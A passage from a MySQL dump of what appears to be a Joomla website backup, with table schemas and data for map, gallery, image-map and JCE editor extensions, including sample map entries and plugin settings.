`bak_fit_bss_dbcache`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_dbcache` ( `id` varchar(32) NOT NULL default '', `groupname` varchar(32) NOT NULL default '', `expire` datetime NOT NULL default '0000-00-00 00:00:00', `value` mediumblob NOT NULL, PRIMARY KEY (`id`,`groupname`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_dbcache` -- LOCK TABLES `bak_fit_bss_dbcache` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_dbcache` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_dbcache` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_fadegallery` -- DROP TABLE IF EXISTS `bak_fit_bss_fadegallery`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_fadegallery` ( `id` int(10) NOT NULL auto_increment, `galleryname` varchar(50) NOT NULL default '', `folder` varchar(255) default NULL, `filelist` text NOT NULL, `width` int(10) unsigned NOT NULL default '400', `height` int(10) unsigned NOT NULL default '300', `interval` int(10) unsigned NOT NULL default '6000', `fadetime` int(10) unsigned NOT NULL default '2000', `fadestep` int(10) unsigned NOT NULL default '20', `align` varchar(20) default NULL, `cssstyle` varchar(255) default NULL, `padding` int(6) unsigned NOT NULL default '0', `randomize` int(1) NOT NULL default '0', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_fadegallery` -- LOCK TABLES `bak_fit_bss_fadegallery` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_fadegallery` DISABLE KEYS */; INSERT INTO `bak_fit_bss_fadegallery` VALUES (1,'dsfs','images/flippingbook','',0,0,0,0,0,'left',NULL,0,0); /*!40000 ALTER TABLE `bak_fit_bss_fadegallery` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_gmapfp` -- DROP TABLE IF EXISTS `bak_fit_bss_gmapfp`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_gmapfp` ( `id` int(10) unsigned NOT NULL auto_increment, `nom` varchar(200) NOT NULL default '', `alias` varchar(255) NOT NULL default '', `adresse` varchar(200) default NULL, `adresse2` varchar(200) default NULL, `ville` varchar(200) default NULL, `departement` varchar(200) default NULL, `codepostal` varchar(80) default NULL, `pay` varchar(200) default NULL, `tel` varchar(30) default NULL, `tel2` varchar(30) default NULL, `fax` varchar(20) default NULL, `email` varchar(100) default NULL, `web` varchar(200) default NULL, `img` varchar(100) default NULL, `album` tinyint(1) NOT NULL default '0', `intro` mediumtext, `message` mediumtext, `horaires_prix` mediumtext, `link` varchar(200) default NULL, `article_id` int(100) default '0', `icon` varchar(100) default NULL, `icon_label` varchar(100) default NULL, `affichage` smallint(1) default '0', `marqueur` varchar(200) default NULL, `glng` varchar(12) default NULL, `glat` varchar(12) default NULL, `gzoom` varchar(2) default NULL, `catid` int(10) unsigned NOT NULL default '0', `userid` int(10) default NULL, `published` tinyint(1) NOT NULL default '0', `checked_out` tinyint(1) NOT NULL default '0', `metadesc` text, `metakey` text, `ordering` int(11) NOT NULL default '0', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_gmapfp` -- LOCK TABLES `bak_fit_bss_gmapfp` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_gmapfp` DISABLE KEYS */; INSERT INTO `bak_fit_bss_gmapfp` VALUES (1,'عمان','leglise','','','','','','','','','','','','Usine_electrique.jpg',0,'<p>عمان الاولى</p>\r\n<p>عمان الثانية</p>','','','',0,'','',0,'http://maps.gstatic.com/intl/fr_ALL/mapfiles/ms/micons/blue-dot.png','35.932910999','31.949381','6',13,62,1,0,'','',2),(2,'الكرك','lusine-electrique-du-canal','route de Nestin','','3','Loiret','45450','France','','','','','','Usine_electrique.jpg',0,'Le 17 septembre 1999, le syndicat mixte de gestion du Canal d\'Orléans fait l\'acquisition de ce bâtiment. Il rentre dans le patrimoine du Canal. Sa cheminée et sa façade sont classés au bâtiment de France le 4 mars 1999. Sa constitution : - construite de 1908 à 1911 - 1 bâtiment centrale comprenant une salle des chaudières et un atelier de réparation - une aire réservée au dépôt de charbon - une cheminée - les maisons autour de cet usine sont les logements : du contre-maître du conducteur de l\'électricien du mécanicien et du chauffeur-concierge Son fonctionnement : Elle est mise en service en 1911.\r\n','\r\nElle fonctionne à la vapeur et produit de l\'électricité distribuée à 11 sous-stations de pompage installées à chaque écluse du versant Loire. Puisée dans la Loire à Combleux, cette eau est élevée de bief en bief grâce à l\'électricité de l\'usine, jusqu\'au point de partage. Une 12ème sous-station placée au pied de la digue de l\'étang de la vallée permet de mettre en réserve l\'eau des périodes pluvieuses, pour l\'utiliser en cas de sécheresse. Son but : Est de subvenir aux besoins en eau . Pourquoi ? Car l\'alimentation en eau du Canal d\'Orléans ne permet d\'assurer une navigation normale que pendant les deux tiers de l\'année. Son histoire : Pour faire face à la baisse de fréquentation des bateaux marchands à la fin du 19ème , plusieurs initiatives sont prises telle la loi Freycinet de 1879 agrandissant les écluses mais la conséquence fut que les besoins en eau augmentèrent ! Chaque éclusée consomme de l\'eau proportionnellement au volume du bassin de l\'écluse. Alors les ingénieurs de cette époque imaginent une alimentation artificielle en construisant l\'usine élévatoire de Fay-aux-Loges entre 1908 et 1911. Elle fonctionne jusqu\'en 1922 car vu les manques de crédits et de trafic, il n\'était plus nécessaire de faire appel à l\'alimentation artificielle. Elle fut abandonnée des décennies. En 1995, un restaurateur, conquis par ce bâtiment, releva le défi de le faire revivre ! En effet, l\'usine devient, après des travaux d\'une ampleur exceptionnelle pour mettre ces bâtiments aux normes de qualité et de sécurité, « les Salons de l\'Ecluse » . Mr Charles Pathé organise des réceptions, des soirées, des séminaires etc... Puis en 1999, malheureusement il vend ... au Syndicat du Canal qui récupère son patrimoine. À ce jour, son devenir est toujours en suspens ! Restauration, guinguette et musée du Canal sont envisagés, ...','Fermée au public.','',0,'','',2,'http://maps.gstatic.com/intl/fr_ALL/mapfiles/ms/micons/blue-dot.png','35.769113302','31.178082956','8',13,62,1,0,'','',4),(4,'العقبة','2011-04-05-10-03-54','route de Nestin','','4','Loiret','45450','France','','','','','','Usine_electrique.jpg',0,'Le 17 septembre 1999, le syndicat mixte de gestion du Canal d\'Orléans fait l\'acquisition de ce bâtiment. Il rentre dans le patrimoine du Canal. Sa cheminée et sa façade sont classés au bâtiment de France le 4 mars 1999. Sa constitution : - construite de 1908 à 1911 - 1 bâtiment centrale comprenant une salle des chaudières et un atelier de réparation - une aire réservée au dépôt de charbon - une cheminée - les maisons autour de cet usine sont les logements : du contre-maître du conducteur de l\'électricien du mécanicien et du chauffeur-concierge Son fonctionnement : Elle est mise en service en 1911. \r\n','\r\nElle fonctionne à la vapeur et produit de l\'électricité distribuée à 11 sous-stations de pompage installées à chaque écluse du versant Loire. Puisée dans la Loire à Combleux, cette eau est élevée de bief en bief grâce à l\'électricité de l\'usine, jusqu\'au point de partage. Une 12ème sous-station placée au pied de la digue de l\'étang de la vallée permet de mettre en réserve l\'eau des périodes pluvieuses, pour l\'utiliser en cas de sécheresse. Son but : Est de subvenir aux besoins en eau . Pourquoi ? Car l\'alimentation en eau du Canal d\'Orléans ne permet d\'assurer une navigation normale que pendant les deux tiers de l\'année. Son histoire : Pour faire face à la baisse de fréquentation des bateaux marchands à la fin du 19ème , plusieurs initiatives sont prises telle la loi Freycinet de 1879 agrandissant les écluses mais la conséquence fut que les besoins en eau augmentèrent ! Chaque éclusée consomme de l\'eau proportionnellement au volume du bassin de l\'écluse. Alors les ingénieurs de cette époque imaginent une alimentation artificielle en construisant l\'usine élévatoire de Fay-aux-Loges entre 1908 et 1911. Elle fonctionne jusqu\'en 1922 car vu les manques de crédits et de trafic, il n\'était plus nécessaire de faire appel à l\'alimentation artificielle. Elle fut abandonnée des décennies. En 1995, un restaurateur, conquis par ce bâtiment, releva le défi de le faire revivre ! En effet, l\'usine devient, après des travaux d\'une ampleur exceptionnelle pour mettre ces bâtiments aux normes de qualité et de sécurité, « les Salons de l\'Ecluse » . Mr Charles Pathé organise des réceptions, des soirées, des séminaires etc... Puis en 1999, malheureusement il vend ... au Syndicat du Canal qui récupère son patrimoine. À ce jour, son devenir est toujours en suspens ! Restauration, guinguette et musée du Canal sont envisagés, ...','Fermée au public.','',0,'','',2,'http://maps.gstatic.com/intl/fr_ALL/mapfiles/ms/micons/blue-dot.png','35.011056661','29.528592404','7',13,62,1,0,'','',5),(3,'الزرقاء','ma-commune','Mairie','48, rue Abbé Georges Thomas','2','Loiret','45450','France','02 38 59 57 11','','02 38 57 03 46','accueil@mairie-fayloges.fr','http://www.mairie-fayauxloges.fr','Usine_electrique.jpg',0,'La ville est située à une vingtaine de kilomètres au nord-est d\'Orléans en lisière de la forêt d\'Orléans et sur le canal d\'Orléans.','','Le maire et ses adjoints reçoivent sur rendez-vous.<br />Secrétariat ouvert au public :<br /> - les lundis, mardis, jeudis, vendredis et samedis de 9h à 12h (sauf : fermé le 1<sup>er</sup> samedi de chaque mois)<br /> - les mercredis de 9h à 12h et de 13h30 â 17h.','',0,'','',0,'http://maps.gstatic.com/intl/fr_ALL/mapfiles/ms/micons/orange-dot.png','36.108959912','32.071929119','10',14,62,1,0,'','',3),(5,'اربد','2011-04-05-10-04-35','route de Nestin','','5','Loiret','45450','France','','','','','','Usine_electrique.jpg',0,'Le 17 septembre 1999, le syndicat mixte de gestion du Canal d\'Orléans fait l\'acquisition de ce bâtiment. Il rentre dans le patrimoine du Canal. Sa cheminée et sa façade sont classés au bâtiment de France le 4 mars 1999. Sa constitution : - construite de 1908 à 1911 - 1 bâtiment centrale comprenant une salle des chaudières et un atelier de réparation - une aire réservée au dépôt de charbon - une cheminée - les maisons autour de cet usine sont les logements : du contre-maître du conducteur de l\'électricien du mécanicien et du chauffeur-concierge Son fonctionnement : Elle est mise en service en 1911. \r\n','\r\nElle fonctionne à la vapeur et produit de l\'électricité distribuée à 11 sous-stations de pompage installées à chaque écluse du versant Loire. Puisée dans la Loire à Combleux, cette eau est élevée de bief en bief grâce à l\'électricité de l\'usine, jusqu\'au point de partage. Une 12ème sous-station placée au pied de la digue de l\'étang de la vallée permet de mettre en réserve l\'eau des périodes pluvieuses, pour l\'utiliser en cas de sécheresse. Son but : Est de subvenir aux besoins en eau . Pourquoi ? Car l\'alimentation en eau du Canal d\'Orléans ne permet d\'assurer une navigation normale que pendant les deux tiers de l\'année. Son histoire : Pour faire face à la baisse de fréquentation des bateaux marchands à la fin du 19ème , plusieurs initiatives sont prises telle la loi Freycinet de 1879 agrandissant les écluses mais la conséquence fut que les besoins en eau augmentèrent ! Chaque éclusée consomme de l\'eau proportionnellement au volume du bassin de l\'écluse. Alors les ingénieurs de cette époque imaginent une alimentation artificielle en construisant l\'usine élévatoire de Fay-aux-Loges entre 1908 et 1911. Elle fonctionne jusqu\'en 1922 car vu les manques de crédits et de trafic, il n\'était plus nécessaire de faire appel à l\'alimentation artificielle. Elle fut abandonnée des décennies. En 1995, un restaurateur, conquis par ce bâtiment, releva le défi de le faire revivre ! En effet, l\'usine devient, après des travaux d\'une ampleur exceptionnelle pour mettre ces bâtiments aux normes de qualité et de sécurité, « les Salons de l\'Ecluse » . Mr Charles Pathé organise des réceptions, des soirées, des séminaires etc... Puis en 1999, malheureusement il vend ... au Syndicat du Canal qui récupère son patrimoine. À ce jour, son devenir est toujours en suspens ! Restauration, guinguette et musée du Canal sont envisagés, ...','Fermée au public.','',0,'','',2,'http://maps.gstatic.com/intl/fr_ALL/mapfiles/ms/micons/blue-dot.png','35.857003926','32.521857595','7',13,62,1,0,'','',6),(6,'مأدبا','madaba','','','','','','','','','','','','',0,'','','','',0,'','',0,'http://maps.gstatic.com/intl/fr_ALL/mapfiles/ms/micons/purple-dot.png','35.794108999','31.71954','6',13,62,1,0,'','',1); /*!40000 ALTER TABLE `bak_fit_bss_gmapfp` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_gmapfp_marqueurs` -- DROP TABLE IF EXISTS `bak_fit_bss_gmapfp_marqueurs`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_gmapfp_marqueurs` ( `id` int(11) NOT NULL auto_increment, `nom` text NOT NULL, `url` text NOT NULL, `published` tinyint(1) NOT NULL default '0', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=50 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_gmapfp_marqueurs` -- LOCK TABLES `bak_fit_bss_gmapfp_marqueurs` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_gmapfp_marqueurs` DISABLE KEYS */; INSERT INTO `bak_fit_bss_gmapfp_marqueurs` VALUES (1,'marqueur','http://www.google.com/mapfiles/marker.png',1),(2,'marqueur home','http://chart.apis.google.com/chart?chst=d_map_xpin_icon&chld=pin_star|home|FFFF00|FF0000',1),(3,'marqueur flag','http://chart.apis.google.com/chart?chst=d_map_xpin_icon&chld=pin_star|flag|FFFF00|FF0000',1),(4,'marqueur info','http://chart.apis.google.com/chart?chst=d_map_xpin_icon&chld=pin_star|info|FFFF00|FF0000',1),(5,'marqueur bar','http://chart.apis.google.com/chart?chst=d_map_xpin_icon&chld=pin_star|bar|FFFF00|FF0000',1),(6,'marqueur cafe','http://chart.apis.google.com/chart?chst=d_map_xpin_icon&chld=pin_star|cafe|FFFF00|FF0000',1),(7,'marqueur perso','http://chart.apis.google.com/chart?chst=d_map_spin&chld=1.2|0|FF0000|10|_|foo|bar',1),(8,'marqueurA','http://www.google.com/mapfiles/markerA.png',1),(9,'marqueurB','http://www.google.com/mapfiles/markerB.png',1),(10,'marqueurC','http://www.google.com/mapfiles/markerC.png',1),(11,'marqueurD','http://www.google.com/mapfiles/markerD.png',1),(12,'marqueurE','http://www.google.com/mapfiles/markerE.png',1),(13,'marqueurF','http://www.google.com/mapfiles/markerF.png',1),(14,'marqueurG','http://www.google.com/mapfiles/markerG.png',1),(15,'marqueurH','http://www.google.com/mapfiles/markerH.png',1),(16,'marqueurI','http://www.google.com/mapfiles/markerI.png',1),(17,'marqueurJ','http://www.google.com/mapfiles/markerJ.png',1),(18,'marqueurK','http://www.google.com/mapfiles/markerK.png',1),(19,'marqueurL','http://www.google.com/mapfiles/markerL.png',1),(20,'marqueurM','http://www.google.com/mapfiles/markerM.png',1),(21,'marqueurN','http://www.google.com/mapfiles/markerN.png',1),(22,'marqueurO','http://www.google.com/mapfiles/markerO.png',1),(23,'marqueurP','http://www.google.com/mapfiles/markerP.png',1),(24,'marqueurQ','http://www.google.com/mapfiles/markerQ.png',1),(25,'marqueurR','http://www.google.com/mapfiles/markerR.png',1),(26,'marqueurS','http://www.google.com/mapfiles/markerS.png',1),(27,'marqueurT','http://www.google.com/mapfiles/markerT.png',1),(28,'marqueurU','http://www.google.com/mapfiles/markerU.png',1),(29,'marqueurV','http://www.google.com/mapfiles/markerV.png',1),(30,'marqueurW','http://www.google.com/mapfiles/markerW.png',1),(31,'marqueurX','http://www.google.com/mapfiles/markerX.png',1),(32,'marqueurY','http://www.google.com/mapfiles/markerY.png',1),(33,'marqueurZ','http://www.google.com/mapfiles/markerZ.png',1),(34,'marqueurBleu','http://maps.gstatic.com/intl/fr_ALL/mapfiles/ms/micons/blue-dot.png',1),(35,'marqueurVert','http://maps.gstatic.com/intl/fr_ALL/mapfiles/ms/micons/green-dot.png',1),(36,'marqueurOrange','http://maps.gstatic.com/intl/fr_ALL/mapfiles/ms/micons/orange-dot.png',1),(37,'marqueurJaune','http://maps.gstatic.com/intl/fr_ALL/mapfiles/ms/micons/yellow-dot.png',1),(38,'marqueurViolet','http://maps.gstatic.com/intl/fr_ALL/mapfiles/ms/micons/purple-dot.png',1),(39,'marqueurRose','http://maps.gstatic.com/intl/fr_ALL/mapfiles/ms/micons/pink-dot.png',1),(40,'purple','http://labs.google.com/ridefinder/images/mm_20_purple.png',1),(41,'yellow','http://labs.google.com/ridefinder/images/mm_20_yellow.png',1),(42,'blue','http://labs.google.com/ridefinder/images/mm_20_blue.png',1),(43,'white','http://labs.google.com/ridefinder/images/mm_20_white.png',1),(44,'green','http://labs.google.com/ridefinder/images/mm_20_green.png',1),(45,'red','http://labs.google.com/ridefinder/images/mm_20_red.png',1),(46,'black','http://labs.google.com/ridefinder/images/mm_20_black.png',1),(47,'orange','http://labs.google.com/ridefinder/images/mm_20_orange.png',1),(48,'gray','http://labs.google.com/ridefinder/images/mm_20_gray.png',1),(49,'brown','http://labs.google.com/ridefinder/images/mm_20_brown.png',1); /*!40000 ALTER TABLE `bak_fit_bss_gmapfp_marqueurs` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_gmapfp_personnalisation` -- DROP TABLE IF EXISTS `bak_fit_bss_gmapfp_personnalisation`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_gmapfp_personnalisation` ( `id` int(10) unsigned NOT NULL auto_increment, `nom` varchar(200) NOT NULL default '', `intro_carte` mediumtext, `conclusion_carte` mediumtext, `intro_detail` mediumtext, `conclusion_detail` mediumtext, `published` tinyint(1) NOT NULL default '0', PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_gmapfp_personnalisation` -- LOCK TABLES `bak_fit_bss_gmapfp_personnalisation` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_gmapfp_personnalisation` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_gmapfp_personnalisation` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_google` -- DROP TABLE IF EXISTS `bak_fit_bss_google`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_google` ( `id` int(11) NOT NULL auto_increment, `name` varchar(100) NOT NULL default '', `setCenter` varchar(250) NOT NULL default '', `width` varchar(11) NOT NULL default '300px', `height` varchar(11) NOT NULL default '300px', `zoomlevel` int(11) NOT NULL default '7', `google_date` timestamp NULL default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP, `description` text NOT NULL, `description2` text NOT NULL, `published` tinyint(1) NOT NULL default '0', `params` text NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_google` -- LOCK TABLES `bak_fit_bss_google` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_google` DISABLE KEYS */; INSERT INTO `bak_fit_bss_google` VALUES (1,'SampleDataCategory','8.7,5.7','100%','400px',7,'2011-04-05 03:44:41','Text in description','',1,'user_interaction=1\nrouting=1\nroute_print=1\nmap_controls=1\nmap_scale_control=1\nmap_scroll_zoom=1\nenable_continuous_zoom=1\nstreet_view=1\nmap_type_controls=0\nadsense=0\nadsense_adsafe=high\nadsense_client=\nadsense_channel='); /*!40000 ALTER TABLE `bak_fit_bss_google` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_google_destinations` -- DROP TABLE IF EXISTS `bak_fit_bss_google_destinations`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_google_destinations` ( `id` int(11) NOT NULL auto_increment, `name` varchar(100) NOT NULL default '', `address` varchar(200) NOT NULL default '', `zipcode` varchar(50) NOT NULL default '', `town` varchar(250) NOT NULL default '', `catid` int(11) NOT NULL default '0', `lat` varchar(200) NOT NULL default '', `long` varchar(200) NOT NULL default '', `icon_type` varchar(50) NOT NULL default '', `published` tinyint(1) NOT NULL default '0', `txt` text NOT NULL, `picture` varchar(255) NOT NULL default '', `assign_routeplanning` tinyint(1) NOT NULL default '1', `ordering` int(11) NOT NULL default '0', `user` int(11) NOT NULL default '0', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_google_destinations` -- LOCK TABLES `bak_fit_bss_google_destinations` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_google_destinations` DISABLE KEYS */; INSERT INTO `bak_fit_bss_google_destinations` VALUES (1,'SampleDataDestination','','','',1,'8.7','5.7','info.png',1,'Text of description','',1,1,62); /*!40000 ALTER TABLE `bak_fit_bss_google_destinations` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_groups` -- DROP TABLE IF EXISTS `bak_fit_bss_groups`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_groups` ( `id` tinyint(3) unsigned NOT NULL default '0', `name` varchar(50) NOT NULL default '', PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_groups` -- LOCK TABLES `bak_fit_bss_groups` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_groups` DISABLE KEYS */; INSERT INTO `bak_fit_bss_groups` VALUES (0,'Public'),(1,'Registered'),(2,'Special'); /*!40000 ALTER TABLE `bak_fit_bss_groups` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_htmlmap` -- DROP TABLE IF EXISTS `bak_fit_bss_htmlmap`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_htmlmap` ( `id` int(11) NOT NULL auto_increment, `title` varchar(50) default NULL, `titleused` tinyint(4) NOT NULL default '0', `image` varchar(100) NOT NULL default '', `folder` varchar(100) NOT NULL default '', `usecss` tinyint(1) NOT NULL default '0', `csstip` text NOT NULL, `csstitle` text NOT NULL, `csstext` text NOT NULL, `checked_out` int(11) NOT NULL default '0', `checked_out_time` datetime default NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_htmlmap` -- LOCK TABLES `bak_fit_bss_htmlmap` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_htmlmap` DISABLE KEYS */; INSERT INTO `bak_fit_bss_htmlmap` VALUES (1,'',1,'joMapBg.jpg','map',0,'df','gdg','d',62,'2011-07-26 09:10:33'); /*!40000 ALTER TABLE `bak_fit_bss_htmlmap` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_htmlmap_links` -- DROP TABLE IF EXISTS `bak_fit_bss_htmlmap_links`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_htmlmap_links` ( `id` int(11) NOT NULL auto_increment, `mapid` int(11) NOT NULL default '0', `title` varchar(50) default NULL, `titleused` tinyint(4) NOT NULL default '0', `usecss` tinyint(1) NOT NULL default '0', `csstip` text NOT NULL, `csstitle` text NOT NULL, `csstext` text NOT NULL, `image` varchar(100) NOT NULL default '', `mousedown` varchar(100) NOT NULL default '', `mouseup` varchar(100) NOT NULL default '', `ordering` int(11) NOT NULL default '0', `description` text, `tooltip` tinyint(1) NOT NULL default '0', `maxwidth` varchar(4) default NULL, `shape` varchar(4) NOT NULL default '', `coords` text, `itemid` int(11) NOT NULL default '0', `url` varchar(255) default NULL, `newpage` tinyint(1) NOT NULL default '0', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_htmlmap_links` -- LOCK TABLES `bak_fit_bss_htmlmap_links` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_htmlmap_links` DISABLE KEYS */; INSERT INTO `bak_fit_bss_htmlmap_links` VALUES (1,1,'',1,0,'','','','my-book_02.jpg','my-book_03.jpg','my-book_08.jpg',1,'<p>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</p>',2,'','rect','102,155,190,218',29,'',0),(2,1,'',1,0,'','','','my-book_02.jpg','my-book_03.jpg','my-book_08.jpg',2,'<img src=\"images/stories/EU_Logo.gif\" width=\"140\" height=\"33\" alt=\"EU_Logo\" />\r\n<div> asdadad</div>\r\n<div>asd ad</div>\r\n<div>asd a</div>\r\n<div>das d</div>\r\n<div>as da</div>',2,'','poly','101,242,132,268,165,240,153,217',0,'',0); /*!40000 ALTER TABLE `bak_fit_bss_htmlmap_links` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_jce_groups` -- DROP TABLE IF EXISTS `bak_fit_bss_jce_groups`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_jce_groups` ( `id` int(11) NOT NULL auto_increment, `name` varchar(255) NOT NULL default '', `description` varchar(255) NOT NULL default '', `users` text NOT NULL, `types` varchar(255) NOT NULL default '', `components` text NOT NULL, `rows` text NOT NULL, `plugins` varchar(255) NOT NULL default '', `published` tinyint(3) NOT NULL default '0', `ordering` int(11) NOT NULL default '0', `checked_out` tinyint(3) NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `params` text NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_jce_groups` -- LOCK TABLES `bak_fit_bss_jce_groups` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_jce_groups` DISABLE KEYS */; INSERT INTO `bak_fit_bss_jce_groups` VALUES (1,'Default','Default group for all users with edit access','','19,20,21,23,24,25','','6,7,8,9,10,11,12,13,14,15,16,17,18,19;20,21,22,23,24,25,26,27,28,30,31,32,35,47;36,37,38,39,40,41,42,43,44,45,46;48,49,50,51,52,53,54,56,57','1,2,3,4,5,6,20,21,36,37,38,39,40,41,48,49,50,51,52,53,54,56,57',1,1,0,'0000-00-00 00:00:00','editor_width=\neditor_height=\neditor_theme_advanced_toolbar_location=top\neditor_theme_advanced_toolbar_align=center\neditor_skin=default\neditor_skin_variant=default\neditor_inlinepopups_skin=clearlooks2\nadvcode_toggle=1\nadvcode_editor_state=1\nadvcode_toggle_text=[show/hide]\neditor_relative_urls=1\neditor_invalid_elements=\neditor_extended_elements=\neditor_event_elements=a,img\ncode_allow_javascript=0\ncode_allow_css=0\ncode_allow_php=0\ncode_cdata=1\neditor_theme_advanced_blockformats=p,div,h1,h2,h3,h4,h5,h6,blockquote,dt,dd,code,samp,pre\neditor_theme_advanced_fonts_add=\neditor_theme_advanced_fonts_remove=\neditor_theme_advanced_font_sizes=8pt,10pt,12pt,14pt,18pt,24pt,36pt\neditor_theme_advanced_default_foreground_color=#000000\neditor_theme_advanced_default_background_color=#FFFF00\neditor_dir=images/stories\neditor_restrict_dir=adminbss,cache,components,includes,language,libraries,logs,media,modules,plugins,templates,xmlrpc\neditor_max_size=1024\neditor_upload_conflict=\neditor_preview_height=550\neditor_preview_width=750\neditor_custom_colors=\nbrowser_dir=\nbrowser_max_size=\nbrowser_extensions=xml=xml;html=htm,html;word=doc,docx;powerpoint=ppt;excel=xls;text=txt,rtf;image=gif,jpeg,jpg,png;acrobat=pdf;archive=zip,tar,gz;flash=swf;winrar=rar;quicktime=mov,mp4,qt;windowsmedia=wmv,asx,asf,avi;audio=wav,mp3,aiff;openoffice=odt,odg,odp,ods,odf\nbrowser_extensions_viewable=html,htm,doc,docx,ppt,rtf,xls,txt,gif,jpeg,jpg,png,pdf,swf,mov,mpeg,mpg,avi,asf,asx,dcr,flv,wmv,wav,mp3\nbrowser_upload=1\nbrowser_upload_conflict=\nbrowser_folder_new=1\nbrowser_folder_delete=1\nbrowser_folder_rename=1\nbrowser_file_delete=1\nbrowser_file_rename=1\nbrowser_file_move=1\nmedia_use_script=0\nmedia_strict=0\nmedia_html5=0\nmedia_version_flash=10,0,32,18\nmedia_version_windowsmedia=5,1,52,701\nmedia_version_quicktime=6,0,2,0\nmedia_version_realmedia=7,0,0,0\nmedia_version_shockwave=11,0,0,458\npaste_dialog_width=450\npaste_dialog_height=400\npaste_html=1\npaste_text=1\npaste_use_dialog=0\npaste_strip_class_attributes=all\npaste_remove_spans=0\npaste_remove_styles=0\npaste_retain_style_properties=\npaste_remove_empty_paragraphs=1\npaste_remove_styles_if_webkit=0\nimgmanager_dir=\nimgmanager_max_size=\nimgmanager_extensions=image=jpeg,jpg,png,gif\nimgmanager_margin_top=default\nimgmanager_margin_right=default\nimgmanager_margin_bottom=default\nimgmanager_margin_left=default\nimgmanager_border=0\nimgmanager_border_width=default\nimgmanager_border_style=default\nimgmanager_border_color=#000000\nimgmanager_align=default\nimgmanager_upload=1\nimgmanager_upload_conflict=\nimgmanager_folder_new=1\nimgmanager_folder_delete=1\nimgmanager_folder_rename=1\nimgmanager_file_delete=1\nimgmanager_file_rename=1\nimgmanager_file_move=1\nadvlink_target=default\nadvlink_content=1\nadvlink_static=1\nadvlink_contacts=1\nadvlink_weblinks=1\nadvlink_menu=1\nadvlink_zoo=1\nspellchecker_engine=googlespell\nspellchecker_languages=English=en\nspellchecker_pspell_mode=PSPELL_FAST\nspellchecker_pspell_spelling=\nspellchecker_pspell_jargon=\nspellchecker_pspell_encoding=\nspellchecker_pspell_dictionary=plugins/editors/jce/tiny